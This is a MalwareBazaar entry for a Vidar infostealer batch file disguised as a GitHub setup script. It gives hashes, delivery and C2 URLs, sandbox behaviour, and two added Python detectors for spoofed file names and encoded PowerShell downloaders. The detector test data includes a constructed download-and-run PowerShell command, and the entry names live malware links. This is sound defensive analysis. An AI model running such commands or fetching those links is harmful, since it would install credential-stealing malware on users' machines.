MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 25aacccb984253d31e2612f2081c0a5f27182474a29ffe6cb03d2386ee4ce8c6. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Vidar
Vendor detections: 10

SHA256 hash: 25aacccb984253d31e2612f2081c0a5f27182474a29ffe6cb03d2386ee4ce8c6
SHA3-384 hash: a8d9159604c94fdeae2c12b401394c41859cc9173128f5582fc2a539796940337349989f597112c4ed1b4b8526610b92
SHA1 hash: 93f5cb4fce1ba897c89f93c35b9601828c8aeb4a
MD5 hash: a836bb725b25ab5cd4805c8e1e94f66a
humanhash: spring-network-saturn-one
File name: ɢɪᴛнᴜʙ seᴛᴜр.bat
Signature: Vidar
File size: 567 bytes
First seen: 2025-05-19 21:58:41 UTC
Last seen: Never
File type: Batch (bat)
MIME type: text/x-msdos-batch
ssdeep: 12:w7Rf6R0t87kZAt2rHR9IbEOONsyIVO98JGz5lX6p5MujTj/39JOwa0:w7RfTJZAt2DR9lOOSk7z55tQtvZ
TLSH: T12DF0813F504970550B7D8720CA185486F4094BCF5995DA5774A0F59DBF752012AEECCD
Magika: batch
Reporter: aachum
Tags: bat vidar


iamaachum
https://outmertupw.xyz/SPy2KC?store=MATLAB&src= => https://www.mediafire.com/file/rswbaet2iwdk8s4/%C9%A2%C9%AA%E1%B4%9B%D0%BD%E1%B4%9C%CA%99+se%E1%B4%9B%E1%B4%9C%D1%80.bat/file

Vidar C2: https://d3.7.4t.com/
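The delivery chain in the reporter's comment ends at a mediafire file whose name is built from IPA small-capital letters and two Cyrillic letters so that it renders as "GITHUB SETUP.bat". The Python below is an added example, not code from the MalwareBazaar page or from the reporter: it decodes the file name out of that URL and flags the lookalike characters. NFKC normalisation does not help here, because the small-capital letters used (U+0262, U+026A, U+1D1B, U+1D1C, U+0299) have no compatibility decomposition, so the check classifies every letter by its Unicode character name instead. The Cyrillic lookalike table is a constructed, partial stand-in for the Unicode confusables data; the other file names passed to it are constructed inputs.

```python
import unicodedata
from typing import Optional
from urllib.parse import unquote_plus, urlsplit

# Delivery URL from the reporter's comment; the file name is percent-encoded UTF-8 in the
# path ('+' stands for a space) and mediafire appends a trailing "/file" segment.
DELIVERY_URL = ("https://www.mediafire.com/file/rswbaet2iwdk8s4/"
                "%C9%A2%C9%AA%E1%B4%9B%D0%BD%E1%B4%9C%CA%99+se%E1%B4%9B%E1%B4%9C%D1%80.bat/file")

# Constructed, deliberately partial map of Cyrillic letters to the Latin letters they
# resemble (assumption: a real deployment would load the Unicode confusables.txt data).
CYRILLIC_LOOKALIKES = {
    "\u0430": "a", "\u0435": "e", "\u043d": "h", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j",
}


def filename_from_url(url: str) -> str:
    """Return the decoded file name carried in the URL path (last segment with an extension)."""
    for segment in reversed(urlsplit(url).path.split("/")):
        name = unquote_plus(segment)          # '+' -> space, %XX -> UTF-8 bytes -> str
        if "." in name:
            return name
    return ""


def script_of(ch: str) -> Optional[str]:
    """Coarse script label taken from the Unicode character name; None for non-letters."""
    if not ch.isalpha():
        return None
    name = unicodedata.name(ch, "")
    if name.startswith("LATIN LETTER SMALL CAPITAL"):
        return "LATIN SMALL CAPITAL"          # looks like a capital, is a distinct IPA letter
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def ascii_skeleton(name: str) -> str:
    """Best-effort ASCII rendering of what the file name is meant to look like to a user."""
    out = []
    for ch in name:
        label = script_of(ch)
        if label == "LATIN SMALL CAPITAL":
            # "LATIN LETTER SMALL CAPITAL G" -> "g"
            out.append(unicodedata.name(ch).rsplit(" ", 1)[1].lower())
        elif label == "CYRILLIC" and ch in CYRILLIC_LOOKALIKES:
            out.append(CYRILLIC_LOOKALIKES[ch])
        else:
            out.append(ch if ord(ch) < 128 else "?")
    return "".join(out)


def assess_filename(name: str) -> dict:
    """Flag mixed scripts, small-capital spoofing and non-ASCII names on script/exe extensions."""
    scripts = sorted({s for s in map(script_of, name) if s})
    findings = []
    if len(scripts) > 1:
        findings.append("mixed scripts: " + ", ".join(scripts))
    if "LATIN SMALL CAPITAL" in scripts:
        findings.append("IPA small-capital letters used in place of Latin capitals")
    risky_ext = (".bat", ".cmd", ".ps1", ".vbs", ".js", ".exe", ".scr", ".lnk")
    if any(ord(c) > 127 for c in name) and name.lower().endswith(risky_ext):
        findings.append("non-ASCII name on an executable/script extension")
    return {"name": name, "looks_like": ascii_skeleton(name), "scripts": scripts,
            "suspicious": bool(findings), "findings": findings}


if __name__ == "__main__":
    for n in (filename_from_url(DELIVERY_URL), "setup.bat", "photoshop-v2.exe"):
        print(assess_filename(n))
```

The "looks_like" field is what to show an analyst or user: the decoded name comes back as "github setup.bat", which is the lure, while the raw name is what a hash-based block list or a file-name rule would actually see.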

Intelligence


File Origin
Uploads: 1
Downloads: 171
Origin country: ES
Vendor Threat Intelligence
Malware family: n/a
ID: 1
File name: ɢɪᴛнᴜʙ seᴛᴜр.bat
Verdict: Malicious activity
Analysis date: 2025-05-19 22:00:29 UTC
Tags: loader

Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Verdict: Malicious
Score: 99.1%
Tags: vmdetect shell virus sage
Result
Verdict: Suspicious
Maliciousness:
Behaviour
Searching for the window
Running batch commands
Launching a process
Creating synchronization primitives
Connection attempt
Sending an HTTP GET request
Creating a file
Creating a process from a recently created file
Creating a window
Creating a process with a hidden window
Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: cmd dropper fingerprint installer lolbin opendir overlay packed powershell
Result
Threat name:
Detection: malicious
Classification: troj.spyw.expl.evad
Score: 100 / 100
Signature
.NET source code contains process injector
.NET source code references suspicious native API functions
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Powershell drops PE file
Searches for specific processes (likely to inject)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious Invoke-WebRequest Execution
Suricata IDS alerts for network traffic
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Yara detected Powershell decode and execute
Yara detected Vidar stealer
Behaviour
Behavior Graph:
Behavior Graph ID: 1694374
Sample: #U0262#U026a#U1d1b#U043d#U1... (file name with non-ASCII characters escaped)
Start date: 19/05/2025
Architecture: WINDOWS
Score: 100
Contacted hosts (sample level): d3.7.4t.com; www.google.com; 3 other IPs or domains
Signatures (sample level): Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 7 other signatures

Process tree (indentation = parent/child; "drops" = files written; "net" = connections; signatures in brackets):
cmd.exe  [Suspicious powershell command line found]
  photoshop-v2.exe
    drops: C:\Users\user\AppData\...\photoshop-v2.tmp (PE32)
    photoshop-v2.tmp
      drops: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
      photoshop-v2.exe
        drops: C:\Users\user\AppData\...\photoshop-v2.tmp (PE32)
        photoshop-v2.tmp
          drops: C:\Users\user\...\mswebprjui.dll (copy) (PE32); C:\Users\user\AppData\...\is-QKTS3.tmp (PE32+); C:\Users\user\AppData\...\is-PIPHP.tmp (PE32+); 62 other files (54 malicious)
          Vecinos.exe  [Encrypted powershell cmdline option found; Tries to harvest and steal browser information (history, passwords, etc); Searches for specific processes (likely to inject)]
            net: d3.7.4t.com 49.13.1.124:443 (HETZNER-AS, Germany); t.me 149.154.167.99:443 (TELEGRAM, United Kingdom)
            powershell.exe  [Writes to foreign memory regions; Creates a thread in another existing process (thread injection)]
              drops: C:\Users\user\AppData\...\q5visnuf.cmdline (Unicode)
              csc.exe
                drops: C:\Users\user\AppData\Local\...\q5visnuf.dll (PE32)
                cvtres.exe
              conhost.exe
            chrome.exe
              net: 192.168.2.4 (ports 138, 443)
              chrome.exe
                net: apis.google.com; www.google.com 142.250.72.164:443 (GOOGLE, United States); 3 other IPs or domains
            powershell.exe
              drops: C:\Users\user\AppData\Local\...\dsrwbiul.0.cs (Unicode)
              csc.exe
                drops: C:\Users\user\AppData\Local\...\dsrwbiul.dll (PE32)
              conhost.exe
            23 other processes
              csc.exe
                drops: C:\Users\user\AppData\Local\...\tsaw332i.dll (PE32)
                cvtres.exe
              csc.exe
                drops: C:\Users\user\AppData\Local\...\lqiuiqsj.dll (PE32)
                cvtres.exe
              csc.exe
                drops: C:\Users\user\AppData\Local\...\kqbsagdu.dll (PE32)
                cvtres.exe
              19 other processes
                drops: C:\Users\user\AppData\Local\...\zk3hvena.dll (PE32); C:\Users\user\AppData\Local\...\tgb3bhd3.dll (PE32); C:\Users\user\AppData\Local\...\oguw5d0g.dll (PE32); 5 other files (none is malicious)
                cvtres.exe (3 instances)
                5 other processes
  cmd.exe
    powershell.exe  [Compiles code for process injection (via .Net compiler); Powershell drops PE file]
  powershell.exe
    net: 185.209.21.111:80 (ON-LINE-DATA Serverlocation-Netherlands Dronten NL, Ukraine)
    drops: C:\Users\user\Desktop\photoshop-v2.exe (PE32)
  conhost.exe
svchost.exe
  net: 127.0.0.1
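The signatures in this section (Suspicious powershell command line found; Encrypted powershell cmdline option found; Sigma: Suspicious Invoke-WebRequest Execution; Sigma: Dot net compiler compiles file from suspicious location) describe a chain that can be tested for offline. The Python below is an added example, not code from MalwareBazaar or from any of the sandbox vendors: it runs those checks over constructed Sysmon-style process-creation events that mirror the process tree. It decodes the -EncodedCommand payload (base64 over the UTF-16LE script text) before matching, flags download cmdlets and a hidden window, and flags csc.exe compiling from %TEMP% under PowerShell, which is the footprint PowerShell's Add-Type leaves (a random-named .cmdline and .0.cs in %TEMP%, a .dll output, cvtres.exe as a child of csc.exe) and matches the q5visnuf.* and dsrwbiul.* artefacts in the tree. Every path, the download URL and the command lines are assumptions; the page does not show the real ones.

```python
import base64
import re
from typing import Dict, List, Optional, Tuple

# Constructed script standing in for the stage-one PowerShell (assumption; the real
# command line is not on the page). The download host is a placeholder.
DOWNLOAD_SCRIPT = (
    "Invoke-WebRequest -Uri http://example.invalid/photoshop-v2.exe "
    "-OutFile $env:USERPROFILE\\Desktop\\photoshop-v2.exe; "
    "Start-Process $env:USERPROFILE\\Desktop\\photoshop-v2.exe"
)


def encode_command(script: str) -> str:
    """powershell -EncodedCommand takes base64 of the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Inverse of encode_command; None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CSC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

# Constructed process-creation events (Sysmon event 1 style), not log data from the page.
EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\user\Downloads\github setup.bat"'},
    {"image": PS, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_command(DOWNLOAD_SCRIPT)},
    {"image": PS, "parent": r"C:\Users\user\AppData\Local\Temp\Vecinos.exe",  # path assumed
     "cmdline": "powershell.exe -NoProfile -Command \"Add-Type -TypeDefinition $src\""},
    {"image": CSC, "parent": PS,   # the csc.exe invocation Add-Type produces
     "cmdline": CSC + r' /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5visnuf.cmdline"'},
    {"image": PS, "parent": r"C:\Windows\explorer.exe",   # benign baseline
     "cmdline": "powershell.exe -Command Get-Process"},
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand; the common ones are listed.
ENCODED_FLAG = re.compile(r"(?<!\S)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_WINDOW = re.compile(r"(?<!\S)[-/]w(?:indowstyle)?\s+hidden", re.I)
DOWNLOADER = re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|downloadfile|"
                        r"downloadstring|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
USER_WRITABLE = re.compile(r"\\(?:AppData|Desktop|Downloads|Temp)\\", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Return the rule names an event trips (empty list when nothing matches)."""
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    findings: List[str] = []
    if image in ("powershell.exe", "pwsh.exe"):
        visible = cmd
        m = ENCODED_FLAG.search(cmd)
        if m:
            findings.append("powershell: -EncodedCommand on the command line")
            decoded = decode_encoded_command(m.group(1))
            if decoded is not None:
                visible = cmd + "\n" + decoded      # match against the decoded script too
        if HIDDEN_WINDOW.search(visible):
            findings.append("powershell: hidden window")
        if DOWNLOADER.search(visible):
            findings.append("powershell: web download cmdlet")
            if parent == "cmd.exe":
                findings.append("powershell: downloader launched from cmd.exe (batch dropper)")
        if USER_WRITABLE.search(ev["parent"]):
            findings.append("powershell: spawned by a binary in a user-writable directory")
    if image == "csc.exe" and TEMP_DIR.search(cmd):
        what = "csc.exe: compiles from %TEMP%"
        if parent in ("powershell.exe", "pwsh.exe"):
            what += " under PowerShell (Add-Type)"
        findings.append(what)
    return findings


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """(index, findings) for every event that trips at least one rule."""
    return [(i, f) for i, ev in enumerate(events) if (f := analyze_event(ev))]


if __name__ == "__main__":
    for i, f in triage(EVENTS):
        print(i, basename(EVENTS[i]["image"]), f)
```

Decoding before matching is the point of the first rule: a regex for Invoke-WebRequest on the raw command line never sees the cmdlet when the script travels in -EncodedCommand, which is exactly the case the "Encrypted powershell cmdline option found" signature is covering.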
Threat name: Script-BAT.Packed.Boxter
Status: Malicious
First seen: 2025-05-19 21:59:13 UTC
File Type: Text (Batch)
AV detection: 9 of 24 (37.50%)
Threat level: 1/5
Result
Malware family:
Score: 10/10
Tags: family:vidar credential_access defense_evasion discovery execution spyware stealer
Behaviour
Checks processor information in registry
Delays execution with timeout.exe
Enumerates system info in registry
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Drops file in Windows directory
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Obfuscated Files or Information: Command Obfuscation
Checks computer location settings
Executes dropped EXE
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Uses browser remote debugging
Detect Vidar Stealer
Vidar
Vidar family
Please note that we are no longer able to provide a coverage score for Virus Total.

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: Vidar
File type: Batch (bat)
SHA256: 25aacccb984253d31e2612f2081c0a5f27182474a29ffe6cb03d2386ee4ce8c6 (this sample)

Delivery method
Distributed via web download

Comments